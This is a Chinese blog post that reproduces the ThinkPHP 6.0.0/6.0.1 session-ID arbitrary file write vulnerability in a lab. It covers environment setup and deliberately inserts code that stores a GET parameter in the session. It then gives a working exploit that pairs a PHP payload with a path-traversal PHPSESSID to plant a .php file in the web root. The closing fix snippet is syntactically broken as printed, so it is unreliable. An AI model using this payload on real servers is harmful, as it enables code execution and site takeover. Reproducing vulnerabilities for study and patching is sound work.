ThinkPHP6.0任意文件上传 PHPSESSION 已亲自复现

ThinkPHP6.0任意文件上传 PHPSESSION 已亲自复现

漏洞名称

漏洞描述

2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。

影响版本

ThinkPHP 6.0.0

ThinkPHP 6.0.1

漏洞复现

环境搭建

受害者IP:192.168.10.145

攻击者IP:127.0.0.1

安装thinkphp6

下载PHPstudy_pro,网上一堆自己找吧,链接不推了。

利用PHPStudy_pro对环境进行安装Composer2.5.8

创建网站,域名think6,会在think6目录下生成.htaccess文件和nginx.htaccess文件,将这两个文件移动到上个目录,也就是www目录下。

打开composer,composer2.5.8,php>=7.2


在www目录下面执行这个命令

bash 复制代码
cd ../
composer create-project topthink/think think6(think6自定义,这个会生成一个文件夹)  

将 think6/composer.json 文件的 "topthink/framework": "^6.0.0" 改成 6.0.0 版本,并执行更新命令

bash 复制代码
进入tp6目录
cd tp6
composer update

在本地访问网站为6.0.0,则成功搭建。

漏洞信息配置

构造位置:think6\app\controller\Index.php

需要增加构造的内容:

bash 复制代码
use think\facade\Session;
session::set('demo',$_GET['c']);

/think6/app/middleware.php 文件开启session,去掉注释session的//

漏洞利用

构造参数c和phpsessid;

bash 复制代码
index?c=<?php phpinfo();?>
PHPSESSID=../../../../public/1omg12377.php

访问public目录下的1omg12377.php文件。

修复建议

官方修复建议:对session id 加一个过滤,使用ctype_alnum()

bash 复制代码
$this->id = is_string($id) && strlen($id) === 32 ctype_alnum($id) && ? $id : md5(microtime(true) . session_create_id());
相关推荐
芯盾时代2 小时前
数字身份发展趋势前瞻:身份韧性与安全
运维·安全·网络安全·密码学·信息与通信
知孤云出岫5 小时前
web 渗透学习指南——初学者防入狱篇
前端·网络安全·渗透·web
mushangqiujin5 小时前
ctfshow web文件上传 web166-170
网络安全
Suckerbin8 小时前
Hms?: 1渗透测试
学习·安全·网络安全
newxtc9 小时前
【国内中间件厂商排名及四大中间件对比分析】
安全·web安全·网络安全·中间件·行为验证·国产中间件
follycat14 小时前
[极客大挑战 2019]HTTP 1
网络·网络协议·http·网络安全
Lionhacker1 天前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术
centos081 天前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
程序员小予1 天前
如何成为一名黑客?小白必学的12个基本步骤
计算机网络·安全·网络安全